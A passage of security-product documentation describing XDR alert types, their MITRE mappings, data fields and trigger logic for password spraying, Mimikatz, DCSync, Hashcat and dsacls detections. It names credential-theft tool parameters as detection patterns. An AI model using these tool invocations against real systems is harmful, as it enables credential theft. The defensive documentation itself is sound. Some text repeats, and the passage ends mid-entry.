Has so many failed login attempts that it triggered the Internal Account Login Failure Anomaly, and
-
Had a successful login
A sample Interflow includes the source IP address (srcip
), login type (login_type
), source host name (srcip_host
), source reputation (srcip_reputation
), source country (srcip_geo.countryName
), and user name (username
).
Stellar Cyber reports both internal and external versions of some alerts, with
different analysis and recommended actions for each. Similarly, IDS signatures report the direction of data flow as inbound
or outbound
. Use the following as a guide for these concepts:
- Addresses with a
srcip_type
ordstip_type
ofprivate
are identified as internal. All other values are identified as external (when applicable; not all alerts have unique analytics for internal/external). - Communications
between hosts where
srcip_type
anddstip_type
are bothprivate
are considered internal communications. - When an anomaly is observed on an internal communication, the attack is considered to be internal.
- Stellar Cyber always sets the
srcip
in the Interflow record as the initiating IP address of an event. Note that IDS signatures, which are reported with relevant alerts, instead list addresses based on the direction of data flow, not the initiating address. So an INBOUND data flow may show thedstip
as the source address and thesrcip
as the destination address, even though thesrcip
was the initiator of the request. Use INBOUND and OUTBOUND information in the signature to understand the direction of data flow, together with Stellar Cyber’s Interflow record ofsrcip
anddstip
to understand which address initiated the threat event.
Internal Password Spraying
An anomalously large number of failed logins with unknown user names was observed on internal Windows authentication services. Check the activity after successful logins, and consider blocking the internal source IP addresses.
XDR Kill Chain
-
Kill Chain Stage: Propagation
-
Tactic: Credential Access (TA0006 )
-
Technique: Brute Force (T1110 )
-
Sub-technique: Password Spraying (T1110.003 )
-
Tags: [Internal]
Event Name
The xdr_event.name
for this alert type in the Interflow data is internal_password_spray
.
Key Fields and Relevant Data Points
srcip
— source IP address generating a failed loginor
event_data.Workstation
— workstation generating a failed loginThe key field for this alert type can be either
srcip
orevent_data.Workstation
, depending on the data feed.event_data.WorkstationName
— workstation associated with the alertingsrcip
(when applicable)event_id
— Windows event ID corresponding to the login failureslogin_type
— type of login; the available values vary byevent_id
actual
— actual number of failed logins with unknown user names in a 5-minute periodtypical
— typical number of failed logins with unknown user names in a 5-minute periodpassword_spray_user_summary
— list of up to 100 unknown user names associated with the failed logins (the first three are shown in the alert description)
Use Case with Data Points
If a potential password spraying attack is observed, an alert is triggered. The Interflow includes a source (srcip
or event_data.Workstation
), timestamp, the type of login (login_type
), the number of failed logins (actual
), the usual number of failed logins (typical
), and a sampling of the user names used in the attack (password_spray_user_summary
).
Stellar Cyber reports both internal and external versions of some alerts, with
different analysis and recommended actions for each. Similarly, IDS signatures report the direction of data flow as inbound
or outbound
. Use the following as a guide for these concepts:
- Addresses with a
srcip_type
ordstip_type
ofprivate
are identified as internal. All other values are identified as external (when applicable; not all alerts have unique analytics for internal/external). - Communications
between hosts where
srcip_type
anddstip_type
are bothprivate
are considered internal communications. - When an anomaly is observed on an internal communication, the attack is considered to be internal.
- Stellar Cyber always sets the
srcip
in the Interflow record as the initiating IP address of an event. Note that IDS signatures, which are reported with relevant alerts, instead list addresses based on the direction of data flow, not the initiating address. So an INBOUND data flow may show thedstip
as the source address and thesrcip
as the destination address, even though thesrcip
was the initiator of the request. Use INBOUND and OUTBOUND information in the signature to understand the direction of data flow, together with Stellar Cyber’s Interflow record ofsrcip
anddstip
to understand which address initiated the threat event.
Internal Credential Stuffing
An anomalously large amount of username/password testing was detected on an internal Windows authentication service. Check the activity after successful logins, and consider blocking the internal source IP addresses.
XDR Kill Chain
-
Kill Chain Stage: Propagation
-
Tactic: [Internal] Credential Access (TA0006 )
-
Technique: Brute Force (T1110 )
-
Tags: [Internal]
Event Name
The xdr_event.name
for this alert type in the Interflow data is internal_credential_stuffing
.
Key Fields and Relevant Data Points
msg_class
—Microsoft-Windows-Security-Auditing
for Windowsservice_id
— specific account ID of a servicelogin_failure_rate
— rate of login failures per minute in the periodunknown_users_rate
— rate of unknown user names per minute in the periodunknown_users_to_login_failures
— ratio of unknown user names to login failures in the periodsuspicious_ips
— suspicious source IP addresses (up to 100)possible_breached_ips
— list of malicious IP addresses that may have successful breach activities
Use Case with Data Points
Internal credential stuffing is the constant testing of username/password combinations on the AWS, Okta, or Windows authentication functions. Login activity is monitored and if the number of failed logins is larger than normal for that service, an alert is triggered. The Interflow includes the service (msg_class
), tenant's account ID on that service (service_id
), suspicious source IP address (suspicious_ips
), login failure rate (login_failure_rate
), unknown user rate (unknown_users_rate
), the ratio of unknown users to login failures (unknown_users_to_login_failures
), and a list of source IP addresses that might have suspicious activities and should be investigated (possible_breached_ips
).
Stellar Cyber reports both internal and external versions of some alerts, with
different analysis and recommended actions for each. Similarly, IDS signatures report the direction of data flow as inbound
or outbound
. Use the following as a guide for these concepts:
- Addresses with a
srcip_type
ordstip_type
ofprivate
are identified as internal. All other values are identified as external (when applicable; not all alerts have unique analytics for internal/external). - Communications
between hosts where
srcip_type
anddstip_type
are bothprivate
are considered internal communications. - When an anomaly is observed on an internal communication, the attack is considered to be internal.
- Stellar Cyber always sets the
srcip
in the Interflow record as the initiating IP address of an event. Note that IDS signatures, which are reported with relevant alerts, instead list addresses based on the direction of data flow, not the initiating address. So an INBOUND data flow may show thedstip
as the source address and thesrcip
as the destination address, even though thesrcip
was the initiator of the request. Use INBOUND and OUTBOUND information in the signature to understand the direction of data flow, together with Stellar Cyber’s Interflow record ofsrcip
anddstip
to understand which address initiated the threat event.
Internal RDP BlueKeep
Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to BlueKeep (CVE-2019-0708) between internal hosts. Check the IP address and block if necessary.
XDR Kill Chain
-
Kill Chain Stage: Propagation
-
Tactic: [Internal] Privilege Escalation (TA0004 )
-
Technique: Exploitation for Privilege Escalation (T1068 )
-
Tags: [Internal; RDP]
Event Name
The xdr_event.name
for this alert type in the Interflow data is internal_rdp_bluekeep
.
Key Fields and Relevant Data Points
ids.signature
— IDS signaturesrcip_host
— source host namedstip_host
— destination host name
Use Case with Data Points
If the scanner by zerosum0x0 is used, an alert is triggered. A sample Interflow includes the IDS signature (ids.signature
), source host (srcip_host
), and destination host (dstip_host
).
Stellar Cyber reports both internal and external versions of some alerts, with
different analysis and recommended actions for each. Similarly, IDS signatures report the direction of data flow as inbound
or outbound
. Use the following as a guide for these concepts:
- Addresses with a
srcip_type
ordstip_type
ofprivate
are identified as internal. All other values are identified as external (when applicable; not all alerts have unique analytics for internal/external). - Communications
between hosts where
srcip_type
anddstip_type
are bothprivate
are considered internal communications. - When an anomaly is observed on an internal communication, the attack is considered to be internal.
- Stellar Cyber always sets the
srcip
in the Interflow record as the initiating IP address of an event. Note that IDS signatures, which are reported with relevant alerts, instead list addresses based on the direction of data flow, not the initiating address. So an INBOUND data flow may show thedstip
as the source address and thesrcip
as the destination address, even though thesrcip
was the initiator of the request. Use INBOUND and OUTBOUND information in the signature to understand the direction of data flow, together with Stellar Cyber’s Interflow record ofsrcip
anddstip
to understand which address initiated the threat event.
Internal RDP Suspicious Outbound
Non-standard tools from an internal host connecting to TCP port 3389 in the other internal host were detected. This could indicate lateral movement attempting to establish an RDP connection. Check the IP address and block if necessary.
XDR Kill Chain
-
Kill Chain Stage: Propagation
-
Tactic: [Internal] Lateral Movement (TA0008)
-
Technique: Remote Services (T1021)
-
Tags: [Internal; RDP]
Event Name
The xdr_event.name
for this alert type in the Interflow data is internal_rdp_suspicious_outbound
.
Key Fields and Relevant Data Points
srcip
— source IP address of the host that connects to TCP port 3389 with a non-standard toolsrcip_host
— source host nameprocess_name
— process name
Use Case with Data Points
Connections to TCP port 3389 are monitored, and if non-standard tools connect, an alert is triggered. A sample Interflow includes the source IP address (srcip
) and the process name (process_name
). The following are the standard tools:
- mstsc.exe
- RTSApp.exe
- RTS2App.exe
- RDCMan.exe
- ws_TunnelService.exe
- RSSensor.exe
- RemoteDesktopManagerFree.exe
- RemoteDesktopManager.exe
- RemoteDesktopManager64.exe
- mRemoteNG.exe
- mRemote.exe
- Terminals.exe
- spiceworks-finder.exe
- FSDiscovery.exe
- FSAssessment.exe
- MobaRTE.exe
- chrome.exe
- thor.exe
- thor64.exe
Stellar Cyber reports both internal and external versions of some alerts, with
different analysis and recommended actions for each. Similarly, IDS signatures report the direction of data flow as inbound
or outbound
. Use the following as a guide for these concepts:
- Addresses with a
srcip_type
ordstip_type
ofprivate
are identified as internal. All other values are identified as external (when applicable; not all alerts have unique analytics for internal/external). - Communications
between hosts where
srcip_type
anddstip_type
are bothprivate
are considered internal communications. - When an anomaly is observed on an internal communication, the attack is considered to be internal.
- Stellar Cyber always sets the
srcip
in the Interflow record as the initiating IP address of an event. Note that IDS signatures, which are reported with relevant alerts, instead list addresses based on the direction of data flow, not the initiating address. So an INBOUND data flow may show thedstip
as the source address and thesrcip
as the destination address, even though thesrcip
was the initiator of the request. Use INBOUND and OUTBOUND information in the signature to understand the direction of data flow, together with Stellar Cyber’s Interflow record ofsrcip
anddstip
to understand which address initiated the threat event.
Internal User Login Failure Anomaly
An anomalous number of login failures between internal IP addresses was observed for one of the following applications: SSH, SMTP, FTP, RDP, SMB, databases, Active Directory, Office 365, Okta, AWS CloudTrail, Google Workspace, Salesforce, or
This alert type has a relatively long detection delay of up to 40 minutes because it waits for login events from high latency data sources and is sensitive to the event order of user logins.
XDR Kill Chain
-
Kill Chain Stage: Propagation
-
Tactic: [Internal] Credential Access (TA0006 )
-
Technique: Brute Force (T1110 )
-
Tags: [Internal]
Event Name
The xdr_event.name
for this alert type in the Interflow data is internal_user_login_fail
.
Key Fields and Relevant Data Points
srcip
— source IP addressdstip
— destination IP addressdstip_host
— destination host nameservice_id
— source domain, workstation, organization, or serviceevent_summary.total_failed
— number of failed logins in the periodevent_summary.total_successful
— number of successful logins in the periodevent_summary.total_fail_ratio
— percent of failed logins in the period, which is:event_summary.total_failed
/ (event_summary.total_failed
+event_summary.total_successful
)accumulated_anomalous_failures
— score value of the model indicating the degree of abnormal activitylogin_type
— type of login, such asssh_traffic
,okta_log
, oraws_cloudtrail
srcip_host
— source host namesrcip_reputation
— source reputation
Use Case with Data Points
Login failures and successes between internal IP addresses are calculated periodically for every source (srcip
) and destination (dstip
) IP address. If the number of failures is significantly larger than the number of successes, an alert is triggered. The Interflow includes the login type (login_type
), source host (srcip_host
), and source reputation (srcip_reputation
).
Stellar Cyber reports both internal and external versions of some alerts, with
different analysis and recommended actions for each. Similarly, IDS signatures report the direction of data flow as inbound
or outbound
. Use the following as a guide for these concepts:
- Addresses with a
srcip_type
ordstip_type
ofprivate
are identified as internal. All other values are identified as external (when applicable; not all alerts have unique analytics for internal/external). - Communications
between hosts where
srcip_type
anddstip_type
are bothprivate
are considered internal communications. - When an anomaly is observed on an internal communication, the attack is considered to be internal.
- Stellar Cyber always sets the
srcip
in the Interflow record as the initiating IP address of an event. Note that IDS signatures, which are reported with relevant alerts, instead list addresses based on the direction of data flow, not the initiating address. So an INBOUND data flow may show thedstip
as the source address and thesrcip
as the destination address, even though thesrcip
was the initiator of the request. Use INBOUND and OUTBOUND information in the signature to understand the direction of data flow, together with Stellar Cyber’s Interflow record ofsrcip
anddstip
to understand which address initiated the threat event.
Login Time Anomaly
A user logged in at an abnormal time. Check with the user.
This alert type has a relatively long detection delay of up to 40 minutes because it waits for login events from high latency data sources and is sensitive to the event order of user logins.
XDR Kill Chain
-
Kill Chain Stage: Initial Attempts
-
Tactic: [External] XDR UBA (XTA0004)
-
Technique: XDR Time Anomaly (XT4005)
-
Tags: [External; User Behavior Analytics]
Event Name
The xdr_event.name
for this alert type in the Interflow data is user_login_time
.
Key Fields and Relevant Data Points
srcip_usersid
— source user IDsrcip_username
— source user namesrcip_host
— host name of corresponding source IP addresssrcip_geo.countryName
— source countrydstip_host
— host name of corresponding destination IP addressactual
— actual login timetypical
— typical login timeactual_range
— actual login time rangetypical_range
— typical login time range
Use Case with Data Points
Every user's (srcip_usersid
) login time (actual
) is compared to the typical login times (typical_range
). If it is outside the range, an alert is triggered. The Interflow includes information such as the source user name (srcip_username
), source host name (srcip_host
), and source country (srcip_geo.countryName
), as well as the destination host (dstip_host
).
Malware on Disk
Malicious software or a potentially unwanted application found on a device and reported as not cleaned. Check with the user.
XDR Kill Chain
-
Kill Chain Stage: Propagation
-
Tactic: [Internal] XDR Malware (XTA0006)
-
Technique: XDR Miscellaneous Malware (XT6001)
-
Tags: [Internal; Malware]
Event Name
The xdr_event.name
for this alert type in the Interflow data is malware_on_disk
.
Key Fields and Relevant Data Points
hostip
— IP address of the hostfile_path
— file pathcomputer_name
— computer namemalware_engine
— malware engine, can beSophos
orWindows Defender
group
— type of malwaretype
— status of malware
Use Case with Data Points
If either of the following occurs, an alert is triggered:
- Sophos engine indicates there is uncleaned malware
- Windows Defender indicates a failure or error when taking actions to protect the system
A sample Interflow includes the computer name (computer_name
), malware engine (malware_engine
), host IP address (hostip
), path to the file (file_path
), type of malware (group
, for Sophos), and status of the malware (type
, for Sophos).
Mimikatz Credential Dump
A potential Mimikatz memory dump was detected. Check the process to determine whether the host is compromised. Consider quarantining the host.
XDR Kill Chain
-
Kill Chain Stage: Propagation
-
Tactic: [Internal] Credential Access (TA0006 )
-
Technique: OS Credential Dumping (T1003 )
-
Tags: [Internal]
Event Name
The xdr_event.name
for this alert type in the Interflow data is mimikatz_mem_scan
.
Key Fields and Relevant Data Points
hostip
— host IP addresshostip_host
— host nameaccess_subject
— process attempting access-
access_mask
— mask that the process used to get access privileges (different access masks indicate different capabilities of the suspicious process)
Use Case with Data Points
If a process (access_subject
) on a Windows host (srcip
) tries to access lsass.exe with a special access mask (access_mask
), an alert is triggered. The Interflow includes the IP address of the Windows host (srcip
), the process performing mimikatz activity (access_subject
), and the access mask used to acquire access privilege (access_mask
).
Mimikatz DCSync
An attempt to replicate Active Directory for the first time on a domain controller, or the first time by that account, has occurred. Evaluate whether the replication is intended and, if not, consider disabling the account involved in the replication and investigate for further signs of compromise.
XDR Kill Chain
-
Kill Chain Stage: Propagation
-
Tactic: [Internal] Credential Access (TA0006 )
-
Technique: OS Credential Dumping (T1003 )
-
Tags: [Internal, Active Directory]
Event Name
The xdr_event.name
for this alert type in the Interflow data is mimikatz_dcsync
.
Key Fields and Relevant Data Points
hostip
— IP address of the targeted domain controllerevent_data.SubjectUserSid
— source user ID associated with the account attempting replicationhostip_host
— host name of the targeted domain controllerevent_data.SubjectUserName
— name of the account that attempted the Active Directory replicationevent_data.SubjectDomainName
— domain of the account that attempted the Active Directory replication
Use Case with Data Points
This alert is triggered when replication of an Active Directory domain controller (hostip
) occurs for the first time or is attempted by a user account or computer account (event_data.SubjectUserName
) that has rarely occurred (days_silent
) or never initiated replication on that DC before. The Interflow includes the IP address of the targeted domain controller (hostip
), the account (event_data.SubjectUserName
) attempting the replication and its domain (event_data.SubjectDomainName
), and the replication operation attempted (event_data.Properties
). (For guidance understanding the GUID in the event_data.Properties field, refer to Microsoft Documentation.)
Validation / Remediation
To triage an alert of this type, consider first verifying whether the Active Directory replication event was expected. If the replication is not intended, then the alert has indicated that a DCSync attack is highly likely. This attack can be very severe, because all password hashes stored on the targeted domain controller might have been dumped. Disable the account involved in the replication as soon as possible and further investigate the account for any signs of compromise.
There is no simple remediation for a confirmed DCSync attack. Evaluate the overall risks of credential leakage and apply appropriate corrective actions, including minimizing accounts with permissions to perform Active Directory replication, and forcing a change of credentials for accounts with weak passwords.
Potential False Positives
The following will trigger an alert:
-
Set up of a new DC
-
Replication of a DC for the first time
Office 365 Access Governance Anomaly
This alert type is deprecated as of the 4.3.7 release. It is replaced by Microsoft 365 alert integration. See Microsoft 365: Valid Accounts (Privilege Escalation) and Microsoft 365: Account Manipulation.
Office 365 generated an access governance alert, which might indicate a change in Exchange admin privileges. Check with the user to make sure this was expected.
XDR Kill Chain
-
Kill Chain Stage: Propagation
-
Tactic: Privilege Escalation (TA0004 )
-
Technique: Valid Accounts (T1078 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is office365_access_governance_alert
.
Key Fields and Relevant Data Points
srcip_usersid
— key ID for the Office 365 accountName
— alert type descriptionSource
— source that generated the alert seen by Stellar Cybersrcip
— source IP address
Use Case with Data Points
For each Office 365 account (srcip_usersid
), access governance alerts detected by Office 365 are checked periodically. If Office 365 finds an access governance alert, an alert is triggered. A sample Interflow includes the account ID (srcip_usersid
), this alert type description (Name
),the alerting source (Source
), and source IP address (srcip
).
Office 365 Admin Audit Logging Disabled
Office 365 admin audit logging was disabled, make sure this change was expected.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Defense Evasion (TA0005 )
-
Technique: Impair Defenses (T1562 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is office365_admin_audit_logging_disabled
.
Key Fields and Relevant Data Points
srcip_usersid
— key ID for the Office 365 accountOrganizationName
— organization with audit logging
Use Case with Data Points
Office 365 monitors each Office 365 account (srcip_usersid
) for admin audit logging status. If admin audit logging is disabled, an alert is triggered. A sample Interflow includes the account ID (srcip_usersid
) and organization name (OrganizationName
).
Office 365 Blocked User
This alert type is deprecated as of the 4.3.7 release. It is replaced by Microsoft 365 alert integration. See Microsoft 365: Valid Accounts (Initial Access).
The Office 365 Security Compliance Center discovered a user exceeding the sending limits of the service or outbound spam policies and blocked the user from sending email. Check with the user.
XDR Kill Chain
-
Kill Chain Stage: Initial Attempts
-
Tactic: [External] XDR UBA (XTA0004)
-
Technique: XDR Suspicious User (XT4008)
-
Tags: [External]
Event Name
The xdr_event.name
for this alert type in the Interflow data is office365_blocked_user
.
Key Fields and Relevant Data Points
srcip_usersid
— key ID for the Office 365 accountSource
— alerting sourcesrcip
— source IP address of the account
Use Case with Data Points
Office 365 monitors email sending actions for each Office 365 account (srcip_usersid
). If an account exceeds the sending limit, an alert is triggered. A sample Interflow includes the account ID (srcip_usersid
), alerting source (Source
), and source IP address (srcip
).
Office 365 Content Filter Policy Changed
The Microsoft Exchange content policy was changed. An overly permissive content policy can allow spammers to send your organization unwanted email. Make sure this change was expected.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Persistence (TA0003 )
-
Technique: Account Manipulation (T1098 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is office365_content_filter_policy_changed
.
Key Fields and Relevant Data Points
srcip_usersid
— key ID for the Office 365 accountOrganizationId
— ID of the organization with the Microsoft content policy changeOrganizationName
— organization with the Microsoft content policy change
Use Case with Data Points
Office 365 monitors all Office 365 accounts (srcip_usersid
) in each organization (OrganizationId
) for a Microsoft Exchange content policy change. If a change is detected, an alert is triggered. A sample Interflow includes the Office 365 account ID (srcip_usersid
), organization ID (OrganizationId
), and organization name (OrganizationName
).
Office 365 Data Exfiltration Attempt Anomaly
This alert type is deprecated as of the 4.3.7 release. It is replaced by Microsoft 365 alert integration. See Microsoft 365: Exfiltration Over Web Service.
The Office 365 Security Compliance Center discovered a data exfiltration attempt. Office 365 then blocked, quarantined, encrypted, or applied a hold on the possible exfiltration. Check with the user.
XDR Kill Chain
-
Kill Chain Stage: Exfiltration & Impact
-
Tactic: Exfiltration (TA0010 )
-
Technique: Exfiltration Over Web Service (T1567 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is office365_data_exfiltration_attempt
.
Key Fields and Relevant Data Points
srcip_usersid
— key ID for the Office 365 accountName
— alert type descriptionSource
— reporting sourcesrcip
— source IP address
Use Case with Data Points
Office 365 periodically checks each Office 365 account (srcip_usersid
) for data exfiltration attempts. If data exfiltration is detected, an alert is triggered. A sample Interflow includes the account ID (srcip_usersid
), this alert type description (Name
), reporting source (Source
), and source IP address (srcip
).
Office 365 Data Loss Prevention
This alert type is deprecated as of the 4.3.7 release. It is replaced by Microsoft 365 alert integration. See Microsoft 365: Exfiltration Over Web Service.
The Office 365 Security Compliance Center discovered data loss. Office 365 then blocked, quarantined, encrypted, or applied a hold on the possible exfiltration. Check with the user.
XDR Kill Chain
-
Kill Chain Stage: Exfiltration & Impact
-
Tactic: Exfiltration (TA0010 )
-
Technique: Exfiltration Over Web Service (T1567 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is office365_data_loss_prevention
.
Key Fields and Relevant Data Points
srcip_usersid
— key ID for the Office 365 accountName
— alert type descriptionSource
— reporting sourcesrcip
— source IP address
Use Case with Data Points
Office 365 periodically checks each Office 365 account (srcip_usersid
) for data loss. If data loss is detected, an alert is triggered. A sample Interflow includes the account ID (srcip_usersid
), this alert type description (Name
), reporting source (Source
), and source IP address (srcip
).
Office 365 File Sharing with Outside Entities
An Office 365 account shared multiple files with entities outside of the organization. Check with the user to make sure this was expected.
XDR Kill Chain
-
Kill Chain Stage: Exfiltration & Impact
-
Tactic: Exfiltration (TA0010 )
-
Technique: Transfer Data to Cloud Account (T1537 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is office365_outside_entity_file_sharing
.
Key Fields and Relevant Data Points
srcip_usersid
— key ID for the Office 365 accountsrcip
— source IP address of the sharing actionsrcip_host
— source host namesrcip_geo.countryName
— source country
Use Case with Data Points
Office 365 monitors sharing with outside entities for each Office 365 account (srcip_usersid
). If an account shares multiple files with outside entities, an alert is triggered. A sample Interflow includes the user ID (srcip_usersid
), source IP address (srcip
), and source country (srcip_geo.countryName
).
Office 365 Malware Filter Policy Changed
The Microsoft Exchange malware filter policy changed. An overly permissive malware filter policy can allow attackers to send malicious attachments to your organization. Make sure this change was expected.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Defense Evasion (TA0005 )
-
Technique: Impair Defenses (T1562 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is office365_malware_filter_policy_changed
.
Key Fields and Relevant Data Points
srcip_usersid
— key ID for the Office 365 accountOrganizationId
— ID of the organization with the Microsoft Exchange malware policy changeOrganizationName
— organization with the Microsoft Exchange malware policy change
Use Case with Data Points
Office 365 monitors all Office 365 accounts (srcip_usersid
) in every organization (OrganizationId
) for Microsoft Exchange malware policy changes. If a change is discovered, an alert is triggered. A sample Interflow includes the account ID (srcip_usersid
), organization ID (OrganizationId
), and organization name (OrganizationName
).
Office 365 Multiple Files Restored
Office 365 detected that multiple files were restored in a short period. Check with the user.
XDR Kill Chain
Event Name
The xdr_event.name
for this alert type in the Interflow data is office365_multi_file_restore
.
Key Fields and Relevant Data Points
srcip_usersid
— key ID for the Office 365 accountEventSource
— event sourcesrcip
— source IP address that caused the restoresrcip_host
— source host name
Use Case with Data Points
Office 365 periodically checks file restore records. If multiple file restore records are detected within a short period, an alert is triggered. A sample Interflow includes the Office 365 account ID (srcip_usersid
), event source (EventSource
), and source IP address (srcip
).
Office 365 Multiple Users Deleted
Office 365 detected that multiple users were deleted in a short period. Check with the user.
XDR Kill Chain
-
Kill Chain Stage: Exfiltration & Impact
-
Tactic: Impact (TA0040 )
-
Technique: Account Access Removal (T1531 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is office365_multi_user_deleted
.
Key Fields and Relevant Data Points
srcip_usersid
— key ID for the Office 365 accountEventSource
— event sourcesrcip
— source IP address that did the deletion
Use Case with Data Points
Office 365 periodically checks user deletion records. If multiple users were deleted within a short period, an alert is triggered. A sample Interflow includes the Office 365 account ID (srcip_usersid
), event source (EventSource
), and source IP address (srcip
).
Office 365 Network Security Configuration Changed
Office 365 identified a change to your organization's network security configuration, which is uncommon. Make sure this was expected.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Persistence (TA0003 )
-
Technique: Account Manipulation (T1098 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is office365_security_conf_changed
.
Key Fields and Relevant Data Points
srcip_usersid
— key ID for ther Office 365 accountOrganizationId
— ID of the organization whose security configuration changedOrganizationName
— name of the organization whose security configuration changed
Use Case with Data Points
Office 365 monitors all Office 365 accounts (srcip_usersid
) in every organization (OrganizationId
) for network security configuration changes. If a change is detected, an alert is triggered. A sample Interflow includes the Office 365 account ID (srcip_usersid
), organization ID (OrganizationId
), and organization name (OrganizationName
).
Office 365 Password Policy Changed
Office 365 identified a change to your organization's password policy, which is uncommon. Make sure this was expected.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Defense Evasion (TA0005 )
-
Technique: Modify Authentication Process (T1556 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is office365_password_policy_changed
.
Key Fields and Relevant Data Points
srcip_usersid
— key ID for the Office 365 accountOrganizationId
— ID of the organization whose password policy changedOrganizationName
— name of the organization whose password policy changed
Use Case with Data Points
Office 365 monitors all Office 365 accounts (srcip_usersid
) in every organization (OrganizationId
) for sharing policy changes. If a change is detected, an alert is triggered. A sample Interflow includes the account ID (srcip_usersid
), organization ID (OrganizationId
), and organization name (OrganizationName
).
Office 365 Sharing Policy Changed
Office 365 identified a change to your organization's sharing policy, which is uncommon. Make sure this was expected.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Persistence (TA0003 )
-
Technique: Account Manipulation (T1098 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is office365_sharing_policy_changed
.
Key Fields and Relevant Data Points
srcip_usersid
— key ID for the Office 365 accountOrganizationId
— ID of the organization whose sharing policy changedOrganizationName
— name of the organization whose sharing policy changed
Use Case with Data Points
Office 365 monitors all Office 365 accounts (srcip_usersid
) in every organization (OrganizationId
) for password policy changes. If a change is detected, an alert is triggered. A sample Interflow includes the Office 365 account ID (srcip_usersid
), organization ID (OrganizationId
), and organization name (OrganizationName
).
Office 365 User Network Admin Changed
The Office 365 account’s network admin information was changed. Make sure this change was expected.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Persistence (TA0003 )
-
Technique: Account Manipulation (T1098 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is office365_user_network_admin_changed
.
Key Fields and Relevant Data Points
srcip_usersid
— key ID for the Office 365 accountOrganizationName
— name of the organization
Use Case with Data Points
Office 365 monitors the network admin information for each Office 365 account (srcip_usersid
). If changes to the network admin are discovered, an alert is triggered. A sample Interflow includes the account ID (srcip_usersid
) and organization name (OrganizationName
).
Password Cracking with Hashcat
A user from a Windows host executed a command-line script that launched either the hashcat.exe command or a command using known Hashcat parameters (-a -m 1000 -r). The Hashcat command is known to use a SAM file from the Windows registry along with a password list to crack passwords.
XDR Kill Chain
-
Kill Chain Stage: Propagation
-
Tactic: [Internal] Credential Access (TA0006 )
-
Technique: Brute Force (T1110 )
-
Tags: [Hashcat]
Event Name
The xdr_event.name
for this alert type in the Interflow data is password_cracking_with_hashcat
.
Key Fields and Relevant Data Points
hostip
— device internal IP addressevent_data.Image
— process running the hashcat toolevent_data.CommandLine
— command used to run the toolcomputer_name
— name of the Windows host
Use Case with Data Points
This alert is triggered if a Windows host (hostip
) executes a PowerShell script with a context that includes one or more flags (event_data.Image
or event_data.CommandLine
) indicating usage of the Hashcat password cracking tool. The Interflow includes the IP address of the Windows host (hostip
), the host name (computer_name
), and the script image (event_data.Image
) or script payload (event_data.CommandLine
).
Validation / Remediation
Check the body of the Powershell script that is reported on the Windows host to identify whether the contents are actually malicious. If malicious, consider quarantining the host.
Potential False Positives
The running of any executable named hashcat.exe
or any command that uses the hashcat signature parameter list (-a -m 1000 -r
).
Password Spraying Attempts Using Dsacls
A user from a Windows host executed a command-line script to launch a command that by name and parameter list indicates an attempt to abuse dsacls.exe for password spraying.
XDR Kill Chain
-
Kill Chain Stage: Initial Attempts
-
Tactic: [Internal] Defense Evasion (TA0005 )
-
Technique: System Binary Proxy Execution (T1218)
-
Tags: [Password Spray;Dsacls]
Event Name
The xdr_event.name
for this alert type in the Interflow data is password_spraying_attempts_using_dsacls
.
Key Fields and Relevant Data Points
hostip
— device internal IP addressevent_data.Image
— process running dsacls for password crackingevent_data.CommandLine
— command used to run the toolevent_data.OriginalFileName
— actual file name that was executedcomputer_name
— name of the Windows host
Use Case with Data Points
This alert is triggered if a Windows host (hostip
) executes a dsacls.exe
with a context that includes one or more flags (event_data.Image
, event_data.CommandLine
, or event_data.OriginalFileName
including /user
and /passwd
as parameters). This indicates possible usage of Dcacls as a password spraying tool. The Interflow includes the IP address of the Windows host (hostip
), the host name (computer_name
), and the script image (event_data.Image
) or the original file name (event_data.OriginalFileName
), and script commandline (event_data.CommandLine
).
Validation / Remediation
Check whether the usage was actually malicious. If so, consider quarantining the Windows host.
Potential False Positives
This alert could be triggered even if the use is a legitimate use of dsacls
to bind to an LDAP session.
Potentially Malicious Windows Event
The Potentially Malicious Windows Event rules are used to identify suspicious activity with Windows Events. This is a generic rule name. Any one or more of these will trigger the Potentially Malicious Windows Event alert type.
Event Name
The xdr_event.name
for this alert type in the Interflow data is windows_security_malicious_event
.
Key Fields and Relevant Data Points
event_id
— Windows event ID associated with the activityhostip
— host IP addresshostip_host
— host namestellar.rule_id
— Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Potentially Malicious Event Alert Type
PowerShell Remote Access
A Windows host executed a PowerShell script interacting with a remote host. Investigate the script and the remote host to determine whether the script is malicious. If so, consider quarantining the host.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Execution (TA0002 )
-
Technique: Command and Scripting Interpreter (T1059 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is powershell_cnc
.
Key Fields and Relevant Data Points
srcip
— source IP address of the Windows hostremote_ip
— IP address of the remote host involved in the scriptevent_data.ScriptBlockText
— contents of the PowerShell script
Use Case with Data Points
If a Windows host (srcip
) executes a PowerShell script that includes potential communication (event_data.ScriptBlockText
) with a remote host (remote_ip
), an alert is triggered. The Interflow includes the IP address of the Windows host (srcip
), the script body (event_data.ScriptBlockText
), and the remote host IP address (remote_ip
).
PowerShell Remote Access
A Windows host executed a PowerShell script interacting with a remote host. Investigate the script and the remote host to determine whether the script is malicious. If so, consider quarantining the host.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
